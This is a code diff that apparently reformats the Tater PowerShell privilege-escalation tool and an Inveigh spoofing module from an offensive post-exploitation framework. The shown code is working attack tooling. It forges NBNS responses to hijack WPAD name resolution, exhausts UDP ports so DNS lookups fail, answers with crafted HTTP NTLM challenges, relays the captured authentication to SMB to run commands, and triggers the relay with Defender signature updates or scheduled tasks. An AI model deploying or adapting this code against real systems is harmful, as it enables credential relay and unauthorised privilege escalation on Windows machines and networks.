                     {
-                        $tater.console_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
+                        $tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay " + "authentication successful for $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string on $SMBRelayTarget")
                         $tater.SMB_relay_active_step = 4
                         SMBRelayExecute $SMB_relay_socket $SMB_user_ID          
                     }
                     else
                     {
-                        $tater.console_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
+                        $tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay " + "authentication failed for $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string on $SMBRelayTarget")
                         $tater.SMB_relay_active_step = 0
                         $SMB_relay_socket.Close()
                     }
+
                 }
+
             }
             else
             {
                 $NTLM = 'NTLM'
-            }    
+            }
+             
         }
 
         $HTTP_timestamp = Get-Date -format r
         $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
         
-        $HTTP_WWW_authenticate_header = (0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20)
+        $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,
+                                        0x74,0x65,0x3a,0x20
 
         if($NTLM)
         {
             $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
-            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
-                + $tater.response_StatusCode`
-                + (0x20)`
-                + $HTTP_response_phrase`
-                + (0x0d,0x0a)`
-                + (0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x70,0x72,0x69,0x76,0x61,0x74,0x65,0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a)`
-                + (0x45,0x78,0x70,0x69,0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,0x30,0x31,0x20,0x4a,0x61,0x6e,0x20,0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,0x0d,0x0a)`
-                + $HTTP_WWW_authenticate_header`
-                + $NTLM`
-                + (0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x30,0x0d,0x0a)`
-                + (0x0d,0x0a)
+
+            $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+                             $tater.response_StatusCode +
+                             0x20 +
+                             $HTTP_response_phrase +
+                             0x0d,0x0a,0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,
+                             0x20,0x70,0x72,0x69,0x76,0x61,0x74,0x65,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
+                             0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,
+                             0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,
+                             0x0d,0x0a,0x45,0x78,0x70,0x69,0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,
+                             0x30,0x31,0x20,0x4a,0x61,0x6e,0x20,0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,
+                             0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,0x0d,0x0a +
+                             $HTTP_WWW_authenticate_header +
+                             $NTLM +
+                             0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,
+                             0x3a,0x20,0x30,0x0d,0x0a,0x0d,0x0a
         }
         elseif($HTTP_request_type -eq 'WPAD')
         {
-            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
-                + $tater.response_StatusCode`
-                + (0x20)`
-                + $HTTP_response_phrase`
-                + (0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20)`
-                + $HTTP_content_length_bytes`
-                + (0x0d,0x0a)`
-                + (0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a)`
-                + (0x44,0x61,0x74,0x65,0x3a)`
-                + $HTTP_timestamp`
-                + (0x0d,0x0a,0x0d,0x0a)`
-                + $HTTP_WPAD_response 
+            $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+                             $tater.response_StatusCode +
+                             0x20 +
+                             $HTTP_response_phrase +
+                             0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
+                             0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
+                             0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
+                             0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
+                             $HTTP_content_length_bytes +
+                             0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
+                             0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
+                             0x0a,0x44,0x61,0x74,0x65,0x3a +
+                             $HTTP_timestamp +
+                             0x0d,0x0a,0x0d,0x0a +
+                             $HTTP_WPAD_response 
         }
         elseif($HTTP_request_type -eq 'Redirect')
         {
-            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
-                + $tater.response_StatusCode`
-                + (0x20)`
-                + $HTTP_response_phrase`
-                + (0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x30,0x0d,0x0a)`
-                + (0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a)`
-                + $HTTP_location`
-                + (0x44,0x61,0x74,0x65,0x3a)`
-                + $HTTP_timestamp`
-                + (0x0d,0x0a,0x0d,0x0a)
+            $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+                             $tater.response_StatusCode +
+                             0x20 +
+                             $HTTP_response_phrase +
+                             0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,
+                             0x3a,0x20,0x30,0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,
+                             0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,
+                             0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a +
+                             $HTTP_location +
+                             0x44,0x61,0x74,0x65,0x3a +
+                             $HTTP_timestamp +
+                             0x0d,0x0a,0x0d,0x0a
         }
         else
         {
-            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x20)`
-                + $tater.response_StatusCode`
-                + (0x20)`
-                + $HTTP_response_phrase`
-                + (0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x31,0x30,0x37,0x0d,0x0a)`
-                + (0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a)`
-                + (0x44,0x61,0x74,0x65,0x3a)`
-                + $HTTP_timestamp`
-                + (0x0d,0x0a,0x0d,0x0a)`
+            $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x20 +
+                             $tater.response_StatusCode +
+                             0x20 +
+                             $HTTP_response_phrase +
+                             0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,
+                             0x3a,0x20,0x31,0x30,0x37,0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,
+                             0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,
+                             0x2f,0x32,0x2e,0x30,0x0d,0x0a,0x44,0x61,0x74,0x65,0x3a +
+                             $HTTP_timestamp +
+                             0x0d,0x0a,0x0d,0x0a
         }
         
-        $HTTP_stream.write($HTTP_response, 0, $HTTP_response.length)
+        $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
         $HTTP_stream.Flush()
         start-sleep -s 1
         $tater.request_RawUrl_old = $tater.request_RawUrl
         $tater.HTTP_client_handle_old= $tater.HTTP_client.Client.Handle
-
     }
 
 }
@@ -1179,37 +1291,42 @@ $HTTP_scriptblock =
 $exhaust_UDP_scriptblock = 
 {
     $tater.exhaust_UDP_running = $true
-    $tater.console_queue.add("$(Get-Date -format 's') - Trying to exhaust UDP source ports so DNS lookups will fail")
+    $tater.console_queue.Add("$(Get-Date -format 's') - Trying to exhaust UDP source ports so DNS lookups will fail")
     $UDP_socket_list = New-Object "System.Collections.Generic.List[Net.Sockets.Socket]"
     $UDP_failed_ports_list = New-Object "System.Collections.Generic.List[Int]"
-
     $i=0
+
     for ($i = 0; $i -le 65535; $i++)
     {
+
         try
         {
+
             if ($i -ne 137 -and $i -ne 53)
             {
-                $IP_end_point = New-Object System.Net.IPEndpoint([Net.IPAddress]::Any, $i)
-                $UDP_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp )
+                $IP_end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]::Any,$i)
+                $UDP_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::Udp)
                 $UDP_socket.Bind($IP_end_point)
                 $UDP_socket_list.Add($UDP_socket)
             }
+
         }
         catch
         {
             $UDP_failed_ports_list.Add($i);
-            $tater.console_queue.add("$(Get-Date -format 's') - Couldn't bind to UDP port $i")
+            $tater.console_queue.Add("$(Get-Date -format 's') - Couldn't bind to UDP port $i")
         }
+
     }
 
     $tater.UDP_exhaust_success = $false
 
     while (!$tater.UDP_exhaust_success)
     {
+
         if(!$suppress_flush_message)
         {
-            $tater.console_queue.add("$(Get-Date -format 's') - Flushing DNS resolver cache")
+            $tater.console_queue.Add("$(Get-Date -format 's') - Flushing DNS resolver cache")
             $suppress_flush_message = $true
         }
 
@@ -1221,28 +1338,31 @@ $exhaust_UDP_scriptblock =
         }
         catch
         {
-            $tater.console_queue.add("$(Get-Date -format 's') - DNS lookup failed so UDP exhaustion worked")
+            $tater.console_queue.Add("$(Get-Date -format 's') - DNS lookup failed so UDP exhaustion worked")
             $tater.UDP_exhaust_success = $true
             break
         }
 
-        $tater.console_queue.add("$(Get-Date -format 's') - DNS lookup succeeded so UDP exhaustion failed")
+        $tater.console_queue.Add("$(Get-Date -format 's') - DNS lookup succeeded so UDP exhaustion failed")
 
-        ForEach ($UDP_port in $UDP_failed_ports_list)
+        foreach ($UDP_port in $UDP_failed_ports_list)
         {
+
             try
             {
-                $IP_end_point = New-Object System.Net.IPEndpoint([Net.IPAddress]::Any, $i)
-                $UDP_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp )
+                $IP_end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]::Any,$i)
+                $UDP_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::Udp)
                 $UDP_socket.Bind($IP_end_point)
                 $UDP_socket_list.Add($UDP_socket)
                 $UDP_failed_ports.Remove($UDP_port)
             }
             catch
             {
-                $tater.console_queue.add("$(Get-Date -format 's') - Failed to bind to $UDP_port during cleanup")
+                $tater.console_queue.Add("$(Get-Date -format 's') - Failed to bind to $UDP_port during cleanup")
             }
-        } 
+
+        }
+
     }
 
     $tater.exhaust_UDP_running = $false
@@ -1254,7 +1374,8 @@ $spoofer_scriptblock =
 
     $Hostname = $Hostname.ToUpper()
 
-    [Byte[]]$hostname_bytes = (0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00)
+    $hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
+                      0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
 
     $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
     $hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
@@ -1263,6 +1384,7 @@ $spoofer_scriptblock =
 
     for ($i=0; $i -lt $hostname_encoded.Count; $i++)
     {
+
         if($hostname_encoded[$i] -gt 64)
         {
             $hostname_bytes[$i] = $hostname_encoded[$i] + 10
@@ -1271,48 +1393,54 @@ $spoofer_scriptblock =
         {
             $hostname_bytes[$i] = $hostname_encoded[$i] + 17
         }
+
     }
 
-    [Byte[]]$NBNS_response_packet = (0x00,0x00)`
-        + (0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20)`
-        + $hostname_bytes`
-        + (0x00,0x20,0x00,0x01,0x00,0x00,0x00,0xa5,0x00,0x06,0x00,0x00)`
-        + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes()`
-        + (0x00,0x00,0x00,0x00)
+    $NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
+                            $hostname_bytes +
+                            0x00,0x20,0x00,0x01,0x00,0x00,0x00,0xa5,0x00,0x06,0x00,0x00 +
+                            ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
+                            0x00,0x00,0x00,0x00
       
     while($tater.exhaust_UDP_running)
     {
         Start-Sleep -s 2
     }
 
-    $tater.console_queue.add("$(Get-Date -format 's') - Flushing DNS resolver cache")
+    $tater.console_queue.Add("$(Get-Date -format 's') - Flushing DNS resolver cache")
     DnsFlushResolverCache
 
-    $tater.console_queue.add("$(Get-Date -format 's') - Starting NBNS spoofer to resolve $Hostname to $SpooferIP")
+    $tater.console_queue.Add("$(Get-Date -format 's') - Starting NBNS spoofer to resolve $Hostname to $SpooferIP")
               
     $send_socket = New-Object System.Net.Sockets.UdpClient(137)
-    $destination_IP = [system.net.IPAddress]::Parse($IP)
+    $destination_IP = [System.Net.IPAddress]::Parse($IP)
     $destination_point = New-Object Net.IPEndpoint($destination_IP,137)
     $send_socket.Connect($destination_point)
        
     while ($tater.running)
     {
+
         :NBNS_spoofer_loop while (!$tater.hostname_spoof -and $tater.running)
         {
+
             for ($i = 0; $i -lt 255; $i++)
             {
+
                 for ($j = 0; $j -lt 255; $j++)
                 {
                     $NBNS_response_packet[0] = $i
                     $NBNS_response_packet[1] = $j                 
-                    [void]$send_socket.send( $NBNS_response_packet,$NBNS_response_packet.length)
+                    $send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length)
 
                     if($tater.hostname_spoof -and $NBNSLimit -eq 'Y')
                     {
                         break NBNS_spoofer_loop
                     }
+
                 }
+
             }
+
         }
 
         Start-Sleep -m 5
@@ -1328,13 +1456,15 @@ $tater_scriptblock =
     if($RunTime)
     {    
         $tater_timeout = new-timespan -Minutes $RunTime
-        $tater_stopwatch = [diagnostics.stopwatch]::StartNew()
+        $tater_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
     }
 
     while ($tater.running)
     {
+
         if($tater.trigger -ne 2)
         {
+
             try
             {
                 $Hostname_IP = [System.Net.Dns]::GetHostEntry($Hostname).AddressList[0].IPAddressToString
@@ -1346,13 +1476,14 @@ $tater_scriptblock =
             
             if($Hostname_IP -eq $SpooferIP)
             {
+
                 if(!$suppress_spoofed_message)
                 {
-                    $tater.console_queue.add("$(Get-Date -format 's') - $Hostname has been spoofed to $SpooferIP")
+                    $tater.console_queue.Add("$(Get-Date -format 's') - $Hostname has been spoofed to $SpooferIP")
                     $suppress_spoofed_message = $true
                 }
 
-                if($NBNSLimit -eq 'y')
+                if($NBNSLimit -eq 'Y')
                 {
                     $tater.hostname_spoof = $true
                 }
@@ -1360,27 +1491,32 @@ $tater_scriptblock =
                 $hostname_spoof = $true
                 $Hostname_IP = ""
             }
-            elseif((!$Hostname_IP -or $Hostname_IP -ne $SpooferIP) -and $NBNS -eq 'y')
+            elseif((!$Hostname_IP -or $Hostname_IP -ne $SpooferIP) -and $NBNS -eq 'Y')
             {
                 $tater.hostname_spoof = $false
                 $hostname_spoof = $false
             }
+
         }
 
         if(!$tater.SMBRelay_success -and $tater.trigger -eq 1)
         {
+
             if(Test-Path "C:\Program Files\Windows Defender\MpCmdRun.exe")
             {
+
                 if(($process_defender.HasExited -or !$process_defender) -and !$tater.SMB_relay_success -and $hostname_spoof)
                 {
-                    $tater.console_queue.add("$(Get-Date -format 's') - Running Windows Defender signature update")
+                    $tater.console_queue.Add("$(Get-Date -format 's') - Running Windows Defender signature update")
                     $process_defender = Start-Process -FilePath "C:\Program Files\Windows Defender\MpCmdRun.exe" -Argument SignatureUpdate -WindowStyle Hidden -passthru
                 }
+
             }
             else
             {
-                $tater.console_queue.add("Windows Defender not found")
+                $tater.console_queue.Add("Windows Defender not found")
             }
+
         }
         elseif(!$tater.SMBRelay_success -and $tater.trigger -eq 2)
         {
@@ -1388,7 +1524,7 @@ $tater_scriptblock =
 
             if($service_webclient.Status -eq 'Stopped')
             {
-                $tater.console_queue.add("$(Get-Date -format 's') - Starting WebClient service")
+                $tater.console_queue.Add("$(Get-Date -format 's') - Starting WebClient service")
                 Start-Process -FilePath "cmd.exe" -Argument "/C pushd \\live.sysinternals.com\tools" -WindowStyle Hidden -passthru -Wait
             }
 
@@ -1404,7 +1540,7 @@ $tater_scriptblock =
                     $tater.task += Get-Random   
                 }
 
-                $tater.console_queue.add("$(Get-Date -format 's') - Adding scheduled task " + $tater.task)
+                $tater.console_queue.Add("$(Get-Date -format 's') - Adding scheduled task " + $tater.task)
                 $process_scheduled_task = "/C schtasks.exe /Create /TN " + $tater.task + " /TR  \\127.0.0.1@$HTTPPort\test /SC ONCE /ST $timestamp_add_string /F"
                 Start-Process -FilePath "cmd.exe" -Argument $process_scheduled_task -WindowStyle Hidden -passthru -Wait
                 
@@ -1414,27 +1550,31 @@ $tater_scriptblock =
 
                 $tater.task_added = $false
 
-                ForEach($scheduled_task in $scheduled_task_list)
+                foreach($scheduled_task in $scheduled_task_list)
                 {
+
                     if($scheduled_task.name -eq $tater.task)
                     {
                         $tater.task_added = $true
                     }
+                
                 }
 
                 $schedule_service.Quit()
 
                 if(!$tater.task_added -and !$tater.SMBRelay_success)
                 {
-                    $tater.console_queue.add("$(Get-Date -format 's') - Adding scheduled task " + $tater.task + " failed")
+                    $tater.console_queue.Add("$(Get-Date -format 's') - Adding scheduled task " + $tater.task + " failed")
                     StopTater
                 }
+
             }
             elseif($tater.task_added -and (Get-Date) -ge $timestamp_add.AddMinutes(2))
             {
-                $tater.console_queue.add("$(Get-Date -format 's') - Something went wrong with the service")
+                $tater.console_queue.Add("$(Get-Date -format 's') - Something went wrong with the service")
                 StopTater
             }
+
         }
 
         if($tater.SMBRelay_success)
@@ -1444,51 +1584,56 @@ $tater_scriptblock =
 
         if($RunTime)
         {
-            if($tater_stopwatch.elapsed -ge $tater_timeout)
+
+            if($tater_stopwatch.Elapsed -ge $tater_timeout)
             {
                 StopTater
             }
+        
         } 
            
         Start-Sleep -m 5
     }
+
  }
 
 # HTTP Listener Startup Function 
-Function HTTPListener()
+function HTTPListener()
 {
+
     if($WPADPort -eq '80')
     {
-        $tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([ipaddress]::loopback,$HTTPPort)
+        $tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::loopback,$HTTPPort)
     }
     else
     {
-        $tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([ipaddress]::any,$HTTPPort)
+        $tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
     }
 
     $tater.HTTP_listener = New-Object System.Net.Sockets.TcpListener $tater.HTTP_endpoint
     $tater.HTTP_listener.Start()
-    $HTTP_runspace = [runspacefactory]::CreateRunspace()
+    $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
     $HTTP_runspace.Open()
     $HTTP_runspace.SessionStateProxy.SetVariable('tater',$tater)
-    $HTTP_powershell = [powershell]::Create()
+    $HTTP_powershell = [PowerShell]::Create()
     $HTTP_powershell.Runspace = $HTTP_runspace
     $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
     $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
     $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null
     $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
     $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
-    $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Command).AddArgument($HTTPPort).AddArgument($WPADDirectHosts).AddArgument($WPADPort) > $null
+    $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Command).AddArgument($HTTPPort).AddArgument(
+                               $WPADDirectHosts).AddArgument($WPADPort) > $null
     $HTTP_powershell.BeginInvoke() > $null
 }
 
 # Exhaust UDP Startup Function
-Function ExhaustUDP()
+function ExhaustUDP()
 {
-    $exhaust_UDP_runspace = [runspacefactory]::CreateRunspace()
+    $exhaust_UDP_runspace = [RunspaceFactory]::CreateRunspace()
     $exhaust_UDP_runspace.Open()
     $exhaust_UDP_runspace.SessionStateProxy.SetVariable('tater',$tater)
-    $exhaust_UDP_powershell = [powershell]::Create()
+    $exhaust_UDP_powershell = [PowerShell]::Create()
     $exhaust_UDP_powershell.Runspace = $exhaust_UDP_runspace
     $exhaust_UDP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
     $exhaust_UDP_powershell.AddScript($exhaust_UDP_scriptblock) > $null
@@ -1496,29 +1641,32 @@ Function ExhaustUDP()
 }
 
 # Spoofer Startup Function
-Function Spoofer()
+function Spoofer()
 {
-    $spoofer_runspace = [runspacefactory]::CreateRunspace()
+    $spoofer_runspace = [RunspaceFactory]::CreateRunspace()
     $spoofer_runspace.Open()
     $spoofer_runspace.SessionStateProxy.SetVariable('tater',$tater)
-    $spoofer_powershell = [powershell]::Create()
+    $spoofer_powershell = [PowerShell]::Create()
     $spoofer_powershell.Runspace = $spoofer_runspace
     $spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
     $spoofer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
-    $spoofer_powershell.AddScript($spoofer_scriptblock).AddArgument($IP).AddArgument($SpooferIP).AddArgument($Hostname).AddArgument($NBNSLimit) > $null
+    $spoofer_powershell.AddScript($spoofer_scriptblock).AddArgument($IP).AddArgument($SpooferIP).AddArgument(
+                                  $Hostname).AddArgument($NBNSLimit) > $null
     $spoofer_powershell.BeginInvoke() > $null
 }
 
 # Tater Loop Function
-Function TaterLoop()
+function TaterLoop()
 {
-    $tater_runspace = [runspacefactory]::CreateRunspace()
+    $tater_runspace = [RunspaceFactory]::CreateRunspace()
     $tater_runspace.Open()
     $tater_runspace.SessionStateProxy.SetVariable('tater',$tater)
-    $tater_powershell = [powershell]::Create()
+    $tater_powershell = [PowerShell]::Create()
     $tater_powershell.Runspace = $tater_runspace
     $tater_powershell.AddScript($shared_basic_functions_scriptblock) > $null
-    $tater_powershell.AddScript($tater_scriptblock).AddArgument($NBNS).AddArgument($NBNSLimit).AddArgument($RunTime).AddArgument($SpooferIP).AddArgument($Hostname).AddArgument($HTTPPort) > $null
+    $tater_powershell.AddScript($tater_scriptblock).AddArgument($NBNS).AddArgument($NBNSLimit).AddArgument(
+                                $RunTime).AddArgument($SpooferIP).AddArgument($Hostname).AddArgument(
+                                $HTTPPort) > $null
     $tater_powershell.BeginInvoke() > $null
 }
 
@@ -1526,13 +1674,13 @@ Function TaterLoop()
 HTTPListener
 
 # Exhaust UDP Start
-if($ExhaustUDP -eq 'y')
+if($ExhaustUDP -eq 'Y')
 {
     ExhaustUDP
 }
 
 # Spoofer Start
-if($NBNS -eq 'y')
+if($NBNS -eq 'Y')
 {
     Spoofer
 }
@@ -1542,8 +1690,10 @@ TaterLoop
 
 if($tater.console_output)
 {
+
     :console_loop while($tater.running -and $tater.console_output)
     {
+
         while($tater.console_queue.Count -gt 0)
         {
             Write-Output($tater.console_queue[0] + $tater.newline)
@@ -1552,11 +1702,13 @@ if($tater.console_output)
 
         if($tater.console_input)
         {
-            if([console]::KeyAvailable)
+
+            if([Console]::KeyAvailable)
             {
                 $tater.console_output = $false
                 BREAK console_loop
             }
+
         }
 
         Start-Sleep -m 5
@@ -1566,7 +1718,7 @@ if($tater.console_output)
     {
         Remove-Variable tater -scope global
     }
-}
 
 }
 
+}

--- a/lib/modules/collection/inveigh.py
+++ b/lib/modules/collection/inveigh.py
@@ -14,13 +14,13 @@ class Module:
             'Background' : True,
 
             'OutputExtension' : None,
-            
+
             'NeedsAdmin' : True,
 
             'OpsecSafe' : True,
 
             'MinPSVersion' : '2',
-            
+
             'Comments': [
                 'https://github.com/Kevin-Robertson/Inveigh'
             ]
@@ -45,27 +45,27 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'SpooferHostsReply' : {
+            'SpooferHostsReply' : {
                 'Description'   :   'Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'SpooferHostsIgnore' : {
+            'SpooferHostsIgnore' : {
                 'Description'   :   'Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'SpooferIPsReply' : {
+            'SpooferIPsReply' : {
                 'Description'   :   'Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'SpooferIPsIgnore' : {
+            'SpooferIPsIgnore' : {
                 'Description'   :   'Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'SpooferRepeat' : {
+            'SpooferRepeat' : {
                 'Description'   :   'Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured (Y/N).',
                 'Required'      :   False,
                 'Value'         :   'Y'
@@ -75,7 +75,7 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   'Y'
             },
-			'LLMNRTTL' : {
+            'LLMNRTTL' : {
                 'Description'   :   'Custom LLMNR TTL in seconds for the response packet.',
                 'Required'      :   False,
                 'Value'         :   ''
@@ -85,7 +85,7 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   'Y'
             },
-			'NBNSTTL' : {
+            'NBNSTTL' : {
                 'Description'   :   'Custom NBNS TTL in seconds for the response packet.',
                 'Required'      :   False,
                 'Value'         :   ''
@@ -100,37 +100,42 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   'Y'
             },
-			'HTTPAuth' : {
+            'HTTPAuth' : {
